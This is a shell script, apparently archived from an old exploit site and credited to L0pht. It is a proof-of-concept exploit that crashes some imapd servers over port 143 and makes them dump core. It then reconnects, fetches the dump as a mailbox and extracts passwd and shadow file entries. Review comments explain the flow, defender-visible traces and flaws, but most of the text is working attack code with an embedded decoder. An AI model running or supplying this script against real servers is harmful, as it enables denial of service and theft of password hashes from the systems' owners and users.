imap_core.sh
#!/bin/sh
#
# A quick little tool that shows the dangers of priveledged programs dumping
# core.
#
# Shout outs to a bunch of people - in particular Nettwerk.
# Hey Nettwerk where'd ya go?
#
# Reading guide (review): this is a proof-of-concept kept as a case study.
# Flow: write two IMAP command scripts and a small base64 decoder to the
# current directory, compile the decoder, pipe the first command set to
# port 143 on the target with nc, and - only if the reply text contains
# "server crashing" - pipe the second set to fetch a mailbox named "core",
# strip the IMAP framing, base64-decode it and run strings over the result.
# Credentials are sent with plaintext LOGIN (see the author's note below).
# From a defender's side the observable artefacts are the plaintext LOGIN
# followed by CREATE/SELECT/COPY on an odd mailbox name, the server's
# "server crashing" reply, and a second session that SELECTs "core".
# Usage: imap_core.sh target username password
# Programs
# NOTE(review): every tool is pinned to an absolute path and none is checked
# for existence up front; a missing binary fails as "not found" mid-run.
NC=/usr/local/bin/nc
CAT=/bin/cat
RM=/bin/rm
GREP=/bin/grep
TAIL=/bin/tail
HEAD=/bin/head
MV=/bin/mv
TR=/bin/tr
STRINGS=/bin/strings
FILE=/bin/file
CC=/usr/local/bin/gcc
# temporary command and storage files
# NOTE(review): fixed names in the current directory rather than mktemp; only
# TMPFILE and CORE carry the PID. The two command files hold the plaintext
# password for as long as they exist on disk (see the cleanup paths below).
CMDS1=nc_commands1
CMDS2=nc_commands2
DECODE64_SRC=b64.c
TMPNAM=vunlklyname
TMPFILE=tmp.$$
# compiled BASE64 decoding program
DECODE64=./b64
# core file - sometimes base64 sometimes actuall dump file
CORE=core.$$
# Argument check: a bare "exit" here returns status 0 even on misuse.
if [ $# != 3 ] ; then
echo "usage: `basename $0` target username password"
exit
fi
echo
echo "[L0pht Heavy Industries - l0pht.com]"
echo "`basename $0` - "
echo " this is a quick proof of concept tool that causes some imapd"
echo " implementations to dump core. Unfortunately the core file "
echo " contains the password and shadow password file in it!"
echo " .mudge [[email protected]]"
echo
# command line supplied variables
# NOTE(review): the password is taken from argv, so it is visible in process
# listings and shell history for the duration of the run. Assigning USER
# also shadows the login shell's USER value for the child processes below.
TARGET=$1
USER=$2
PASS=$3
# resultant password and shadow files
# Written to the current directory with whatever the default umask allows;
# nothing below tightens their permissions.
PASSWD=./etc_passwd_$TARGET
SHADOW=./etc_shadow_$TARGET
# the following logs in in plaintext as opposed through X AUTHENTICATE -
# you have been forwarned...
# login with $user $pass
# create a folder that probably isn't there
# select the folder
# copy the file to another name
# the above will cause IMAP4rev1 to crash via calling dummy_copy
# note: there are many other ways to get this thing to crash.
# NOTE(review): $USER and $PASS are expanded into the heredoc unquoted and
# unescaped; a value containing whitespace or a newline changes the
# LOGIN line as sent.
cat > $CMDS1 << FOEFOE
1 LOGIN $USER $PASS
2 CREATE $TMPNAM
3 SELECT $TMPNAM
4 COPY $TMPNAM $TMPNAM.$$
FOEFOE
# login with $user $pass (again in plaintext...)
# select the core file
# retrieve the core file base64 encoded as per RFC822
# delete the core file
# delete the temporary file we created
# bye bye
cat > $CMDS2 << FOEFOE
1 LOGIN $USER $PASS
2 SELECT core
3 UID FETCH 1 (UID RFC822.SIZE RFC822)
4 DELETE core
5 DELETE $TMPNAM
4 LOGOUT
FOEFOE
# The following quick little program to decode base64 was yanked in
# big chunks from Dave Winer's code sitting on
# http://www.scripting.com/midas/base64/source.html
# hey, credit where it's due - Dave saved me some time here.
# modest changes by: [email protected]
# NOTE(review): the heredoc delimiter is unquoted, so the C source below is
# subject to shell parameter/command expansion before it is written out;
# it happens to contain no "$" or backticks, which is why it survives intact.
cat > $DECODE64_SRC << FOEFOE
#include <stdio.h>
#define TRUE 1
#define FALSE 0
void decodefile(FILE *, FILE *);
int main(int argc, char *argv[]){
FILE *fin, *fout;
if (argc > 3){
printf("Usage: %s <infile> <outfile>\n", argv[0]);
exit(1);
}
switch(argc){
case 3:
fin = fopen(argv[1], "r");
fout = fopen(argv[2], "w");
if (!fin || !fout) {
perror("fopen");
exit(1);
}
break;
case 2:
fin = fopen(argv[1], "r");
fout = stdout;
if (!fin) {
perror("fopen");
exit(1);
}
break;
case 1:
fin = stdin;
fout = stdout;
break;
}
decodefile(fin, fout);
close(fin);
close(fout);
exit(0);
}
void decodefile(FILE *fin, FILE *fout) {
short charctr;
int breakout;
unsigned char ch;
unsigned char inbuf[3], outbuf[4];
short bufctr = 0, ignore, eot = 0;
while ((ch = fgetc(fin))) {
if (feof(fin)){
close(fin);
break;
}
ignore = FALSE;
if ((ch >= 'A') && (ch <= 'Z'))
ch = ch - 'A';
else if ((ch >= 'a') && (ch <= 'z'))
ch = ch - 'a' + 26;
else if ((ch >= '0') && (ch <= '9'))
ch = ch - '0' + 52;
else if (ch == '+')
ch = 62;
else if (ch == '=')
eot = TRUE;
else if (ch == '/')
ch = 63;
else
ignore = TRUE;
if (!ignore) {
charctr = 3;
breakout = FALSE;
if (eot) {
if (bufctr == 0)
break;
if ((bufctr == 1) || (bufctr == 2))
charctr = 1;
else
charctr = 2;
bufctr = 3;
breakout = TRUE;
}
inbuf[bufctr++] = ch;
if (bufctr == 4) {
bufctr = 0;
outbuf[0] = (inbuf[0] << 2) | ((inbuf[1] & 0x30) >> 4);
outbuf[1] = ((inbuf[1] & 0x0F) << 4) | ((inbuf[2] & 0x3C) >> 2);
outbuf[2] = ((inbuf[2] & 0x03) << 6) | (inbuf[3] & 0x3F);
fprintf(fout, "%c%c%c", outbuf[0], outbuf[1], outbuf[2]);
}
if (breakout)
break;
}
}
}
FOEFOE
# Compile the decoder; success is judged only by the output being executable.
$CC -o $DECODE64 $DECODE64_SRC
if [ ! -x $DECODE64 ] ; then
echo "failed to compile base 64 decoding utility"
echo "stop"
# NOTE(review): this exit path removes only the decoder files; nc_commands1
# and nc_commands2 (which contain the password) are left on disk.
$RM -f $DECODE64_SRC $DECODE64
exit
fi
echo "[Starting]"
echo "Built base64 decoder..."
echo
echo "Running imap attack..."
# First session: commands piped to nc with a 10 second timeout; the whole
# server reply is captured in TMPFILE.
$CAT $CMDS1 | $NC -w 10 $TARGET 143 > $TMPFILE
# Outcome is decided purely on the reply text. A refused or timed-out
# connection produces no match and is reported below as a failed crash;
# nc's own exit status is never examined.
grep -i "server crashing" $TMPFILE > /dev/null
if [ $? -eq 0 ] ; then
echo
echo "Forced server to dump core. Reconnecting to grab file and clean up!"
# Second session: the raw reply (IMAP framing plus base64 body) lands in CORE.
$CAT $CMDS2 | $NC -w 10 $TARGET 143 > $CORE
$RM -f $CMDS1 $CMDS2 $TMPFILE
echo "Stripping trailing c/r from RFC822 base64 encapsulated core file"
# interesting... I must've missed the section of rfc 1521 that stated
# they'd make this DOS'ish
$TR -d '\015' < $CORE > $CORE.2 # strip off ^M's from file
$MV -f $CORE.2 $CORE
else
echo "Failed to crash server... cleaning up"
$RM -f $CMDS1 $CMDS2 $TMPFILE $DECODE64 $DECODE64_SRC
exit
fi
echo "Removing imap crap from beginning and end of $CORE"
# Keep everything after the first blank line (end of the header block).
# Assumes exactly one blank line; several would make expr fail.
VAR=`grep -n "^$" $CORE | awk -F: '{print $1}'`
VAR=`expr $VAR + 1`
$TAIL +$VAR $CORE > $TMPFILE
# Then keep everything up to the line containing "=", taken as the
# base64 padding line; again assumes exactly one such line.
VAR=`grep -n "=" $TMPFILE | awk -F: '{print $1}'`
$HEAD -$VAR $TMPFILE > $CORE
$RM $TMPFILE
echo
echo "Converting base64 image to binary core file..."
$DECODE64 $CORE $TMPFILE
$MV $TMPFILE $CORE
$FILE $CORE
# passwd-style lines are those containing ":x:"; shadow-style lines are
# printable runs of at least 13 characters with a ":" but no space and
# no ":x:". Both are heuristics over strings(1) output.
$STRINGS - $CORE | $GREP ':x:' > $PASSWD
$STRINGS -n 13 - $CORE | $GREP ':' | $GREP -v ' ' | $GREP -v ':x:' > $SHADOW
if [ -s $PASSWD ] ; then
echo
echo "Successfully grabbed some form of password file for $TARGET"
echo " results located in $PASSWD"
else
echo "failed to create $PASSWD"
$RM -f $PASSWD
fi
if [ -s $SHADOW ] ; then
echo "Successfully grabbed some form of shadow file for $TARGET"
echo " results located in $SHADOW"
echo " [note: some manual cleanup of $SHADOW is probably required]"
echo
else
echo "failed to create $SHADOW"
echo
$RM -f $SHADOW
fi
# Final cleanup removes the decoder only; the decoded core image itself is
# kept under core_<target> in the current directory.
$RM -f $DECODE64 $DECODE64_SRC
$MV -f $CORE core_${TARGET}
echo "[Finished]"
# www.hack.co.za #